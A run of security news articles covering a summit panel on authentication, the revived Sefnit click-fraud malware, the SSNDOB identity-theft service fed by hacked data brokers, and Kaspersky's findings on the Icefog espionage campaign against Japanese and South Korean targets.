WASHINGTON–Security, like a lot of other things, tends to go in phases. A new attack technique is developed, vendors respond with a new defensive technology and then attackers find a way to defeat it. It has always been that way. And right now, things seem to be in one of those periodic down cycles in which the attackers have the upper hand.
In the past, what’s helped break this cycle is innovation, a new technology or architecture that helps swing things back in the other direction. At least temporarily. Security executives at some of the larger financial institutions and network operators in the world, speaking on a panel here Wednesday, said that the time has come for another such shake-up.
“I think we’re in a security rut right now,” said Ed Amoroso, chief security officer at AT&T, said during the panel discussion at the Billington Cybersecurity Summit.
The problem at hand is that while attackers have been adapting and changing their techniques and methods rapidly over the course of the last couple of years, the defensive community has yet to catch up and make the changes necessary to restore some semblance of order. Attackers, like those behind the newly discovered Icefog attack, have the upper hand in many respects, not the least of which is in having the luxury of time to surveil their targets, learn the lay of the land and find the weak spots they need to get in. Security teams, even well-organized and experienced ones, are at a disadvantage in this equation. Even if an attack is discovered in process, it’s sometimes difficult to tell what’s been taken, how long the attackers had access to the network and which machines have been compromised.
As the maxim goes, the attackers only need to be right once, while the defenders have to be right all the time.
Changing that state of affairs won’t happen overnight and the path to that destination certainly isn’t free of obstacles. It may require changing some of the fundamental processes and systems that have been mainstays of the security infrastructure for decades. Authentication, for example. Considered a foundational technology for as long as computers have been around, authentication may have outlived its usefulness.
“In my world, authentication isn’t a word that we’re using anymore,” said Charles Blauner, global head of information security at Citi, who was part of the Billington panel. “It’s time to move beyond that. For us, we’re thinking in terms of recognition rather than authentication. It’s about having the system say, ‘I recognize you’, and go from there.”
One of the things that’s been touted as a fix for the authentication problem is biometric technology. The thinking goes that requiring a user to employ both a password and something like a fingerprint or iris scan makes it much more difficult for an attacker to impersonate him. However, not all biometrics are created equal, Amoroso said.
“There are two flavors of biometrics. One is flavor A, where you store the fingerprint locally on the device and it’s used there,” he said. “Flavor B, you take biometric and send it out over the wire and it’s stored in a central database. Once it goes over the wire, it can be compromised. And it can’t be changed. So I think flavor A is good, but flavor B needs some work.”
Change comes slowly in security, but it may be time to speed things up.
A malware family, likely developed by the same authors who built a massive botnet recently discovered on the Tor network, has been revived with a stealthy new click-fraud scam.
Microsoft reports a rash of new click-fraud activity linked to the Sefnit malware, which was thought dead and buried as of 2011, Microsoft Malware Protection Center researcher Geoff McDonald wrote in a blogpost this week.
McDonald said Microsoft discovered a new click-fraud component to the Sefnit malware in June, one that uses the open source 3proxy project. Originally, Microsoft said, it had classified the click-fraud portion of Sefnit as the Mevade malware; it now considers them to be of the same family.
“The botnet of Sefnit-hosted proxies are used to relay HTTP traffic to pretend to click on advertisements,” McDonald said.
Using the proxies keeps the noise level down on Sefnit activity, unlike previous versions of the malware which would hijack clicks from search engine results, sending those clicks through an agency to a webpage resembling the user’s destination.
“These clicks are generally considered quite high value and are hard to detect from an antifraud perspective,” McDonald said.
There was nothing stopping observant users, however, from noticing that they had not landed on the site they were looking for and submitting the issue a security researcher, Microsoft said. The unwanted attention, experts thought, caused the Sefnit gang to close up shop.
In June, the malware was found again operating as a proxy service on 3proxy.
“The new version of Sefnit exhibits no clear visible user symptoms to bring attention to the botnet,” McDonald said. “This allowed them to evade attention from antimalware researchers for a couple years.”
The botnet of proxies now sends requests, or phony ad clicks, through a network of affiliate search programs such as mywebsearch[.]com and legitimate ad agencies to eventually defraud a legitimate advertiser.
Microsoft provides an example using Groupon. The Sefnit authors are likely a mywebsearch affiliate, and use the proxy service to redirect traffic to the affiliate to “fake a click” on a Google ad on the Groupon site, defrauding Groupon in the process. The retailer must pay Google for the phony click; Google takes its share and in turn pays out the rest to the mywebsearch affiliate.
To keep the scam persistent, the malware authors have built time lags into the scheme so that the malware will not click too often on the ads, alerting antifraud services.
Microsoft said the Sefnit Trojan is being spread alongside legitimate installations of the File Scout application, also developed by the Sefnit gang.
“Specifically, it expects a similar format xml structure for the C&C-download and execute commands, both applications are distributed together, and the two applications were compiled 15 minutes apart with the same compiler,” McDonald said.
Sefnit is also spreading on some InstallBrain software bundler installers and through the eMule peer-to-peer network.
“The authors have adapted their click fraud mechanisms in a way that takes user interaction out of the picture while maintaining the effectiveness,” McDonald said. “This removal of the user-interaction reliance in the click fraud methodology was a large factor in the Sefnit authors being able to stay out of the security-researchers’ radars over the last couple of years.”
Mevade, meanwhile, caused a stir in mid-August when experts realized the number of Tor users had skyrocketed from 500,000 to close to 3 million and speculated that a botnet had set up shop on the network and the botmaster was using it to communicate with compromised hosts and to avoid potential takedown attempts.
The decision to move to Tor, however, was its undoing. Experts at Damballa Labs said the influx of Tor users drew unwanted attention to the botnet leading to its detection. Researcher Mark Gilbert told Threatpost that the botmaster was likely renting out portions of the Mevade botnet for click-fraud, adware scams and even data exfiltration.
An online peddler of Social Security numbers, credit and background check reports, and other information valuable to identity thieves appears to have ascertained this data by compromising the systems of a number of prominent data brokerage firms, according to an investigative report published by security reporter Brian Krebs.
The website is SSNDOB[dot]MS and Krebs characterizes it as an “identity theft service.” Whomever is responsible for the service, the report claims, compromised and installed botnet malware on the systems of a number of prominent data firms, including two servers at the legal database company LexisNexis, another two servers at Dun & Bradstreet, a New Jersey-based collector of corporate licensure information, and a fifth server belonging to an employment background screening company called Kroll Background America Inc.
The malware infected servers transmitted data from these systems to a command and control server under the control of SSNDOB’s operators, supplying some amount of the information sold on that site. Krebs ran the malware samples through Virus Total, a website that scans malicious files to see which antivirus products will detect them, in early September. None of the 46 tools used by Virus Total detected the threat. At publication, Krebs said that the total had risen to six of 46 tools.
Over the summer, the site was compromised, giving Krebs and others access to the entire database. An examination of that database revealed that the site had some 1,300 customers that spent hundreds of thousands of dollars collecting the SSNs, birth dates, drivers license records, and the credit and background check information of more than four million U.S. citizens.
The source of all this data remained unknown until a group of hackers apparently associated with the UGNazi hacktivist collective used SSNDOB to accrue data for another website, exposed[dot]su, that publishes various information about celebrities and prominent public figures. Beyonce, Jay Z, First Lady Michelle Obama, CIA Director John Brennan, and former FBI Director Robert Mueller are among the individuals whose information could be found on the site, according to Krebs. The information on this second site highlighted the thoroughness SSNDOB’s access to sensitive information, but it wasn’t until the site was later compromised that Krebs was able to examine the entire database.
Beyond statistical information, the compromise of SSNDOB gave Krebs the ability to analyze the network activity there, which in turn led him to the existence of the botnet fueling the service.
SSNDOB has been running for two years, offering personal information such as SSNs and birth records for between 50 cents and $2.50 and credit background check information for between $5 and $15, according to the report.
Krebs writes that LexisNexus confirmed the compromise, Dun & Bradstreet told Krebs the information he provided was “very helpful,” and Kroll Background America’s parent company, Altegrity, neither confirmed nor denied the compromise. All three companies are coordinating with law enforcement and the FBI is “aware of and investigating the case.”
An espionage campaign featuring precise targeting of victims and malware that allows the attackers one-on-one interaction with compromised systems has been uncovered. Government agencies, manufacturers, high tech companies and media organizations in South Korea and Japan have been the primary targets of the campaign called Icefog, which was reported today by researchers at Kaspersky Lab.
The China-based campaign is two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a spear-phishing email, or are lured to a compromised website and infected with malware.
However, while other APT campaigns maintain a long-term persistence inside infected networks, Icefog seems to do just the opposite. The attackers, Kaspersky researchers said, know what they need from a victim and once they have it, the target is abandoned. They’re also likely a small group of hired guns, akin to mercenaries, used to attack a particular group, steal data, and get out quickly.
“We’ve entered the era of a growing number of these smaller, agile groups hired on a per-project basis,” said Kaspersky Lab researcher Kurt Baumgartner, speaking today at the Billington Cybersecurity Summit in Washington, D.C. “The operational improvements have arrived and these polished APT groups become much better at flying under the radar.
“Finding a pattern in all the noise is not easy. It’s becoming harder and harder to identify the patterns and connect them with a group,” Baumgartner said.
To date, Kaspersky Lab’s Global Research and Analysis Team has observed six variants of Icefog and has been able to sinkhole 13 domains used in the attack, capturing snapshots of the malware used and logs detailing victims and interaction with command and control servers.
Windows and Mac OS X versions of Icefog have also been observed, but it appears the OS X backdoor is merely a beta trial of the malware, largely found in online Chinese bulletin boards. Meanwhile, more than 200 unique Windows-based IP addresses have connected to a Kaspersky-controlled sinkhole, a fraction of the total infections researchers said.
“There’s a team of operators that are being very selective and going after exactly what they need,” said Baumgartner, right. “It’s classic APT behavior. They likely have previous knowledge of the networks and targets.”
Those targets include defense industry contractors such as Lig Nex1 and Selectron Industrial Company, shipbuilding companies DSME Tech, Hanjin Heavy Industries, telecom operators such as Korea Telecom and media companies such as Fuji TV.
Icefog not only establishes a backdoor connection to the attacker-controlled command infrastructure, but it also drops a number of tools that allow the attackers to steal certain document types and pivot within an infected company looking for more computers to infect and additional resources to steal.
The campaign also relies on exploits for vulnerabilities that have been patched in Windows or Java to establish a foothold on an endpoint. Remote code execution bugs in Windows (CVE-2012-0158 and CVE-2012-1856) spread via malicious Word or Excel files are the most common means of initiating the Icefog attack. The infected attachments promise anything from an illicit image of a woman to a document written in Japanese titled: “Little enthusiasm for regional sovereignty reform.” Users are also sent links to compromised sites hosting Java exploits (CVE-2013-0422 and CVE-2012-1723).
Separate spear phishing campaigns were also spotted using HLP files—older versions of Winhelp files—to infect targets. Winhelp was supported natively until Windows Vista was released.
Another spear phishing effort used HWP document files to spread Icefog; HWP is a proprietary document format used in South Korea, in particular by the government.
Once a machine is compromised, the attackers individually analyze system information and files stored on the machine and if it passes muster, the backdoor and lateral movement tools are remotely sent to the machine, including password and hash-dumping tools for saved Internet Explorer and Outlook passwords. A compression program is also sent down to compress stolen data before it’s sent to the command and control server. Beyond credentials, victims are losing Windows address book files (.WAB), as well as HWP, Excel and Word files.
Of the six variants, the oldest in 2011 was used in an attack against Japan’s House of Representatives and House of Councilors. Six AOL email addresses were used and commands were also fetched from these accounts.
The most commonly seen Icefog variant is called Type 1 and it has all the backdoor and lateral movement capabilities described earlier, as well as giving the attackers access to execute SQL commands on SQL Servers found on the network. It’s here where the term Icefog was seen in a string used in the command and control server (the C&C software is named Dagger Three). The command and control script, meanwhile, provides a professional looking interface used to communicate and interact with compromised machines. It uses the native file system to store stolen data and temporary files.
“Perhaps the most interesting part is that the Type 1 C&C panel maintains a full history of the attacker’s interaction with the victims,” the report said. “This is kept as an encrypted logfile, in the ‘logs’ directory on the server. In addition to that, the server maintains full interaction logs and command execution results from each victim.”
Another variant was used to enhance Type 1 infections with additional encryption obfuscating communication with command servers. It was not used against victims and disappeared once a machine was rebooted.
Samples for two other variants have yet to be obtained, but Kaspersky was able to sinkhole three domains used with these attacks. These two variants had only view and update capabilities.
The most recent version, Icefog-NG, doesn’t communicate with a central command server and instead of using a webserver, its command and control is a Windows desktop application that works as a standalone TCP server listening on port 5600.
Kaspersky said it first obtained an Icefog sample in June after an attack on Fuji TV. It was able to connect the dots back to the attack on the Japanese parliament two years ago.
“We predict the number of small, focused APT-for-hire groups to grow, specializing in hit-and-run operations, a kind of ‘cyber-mercenaries’ of the modern world,” the report said.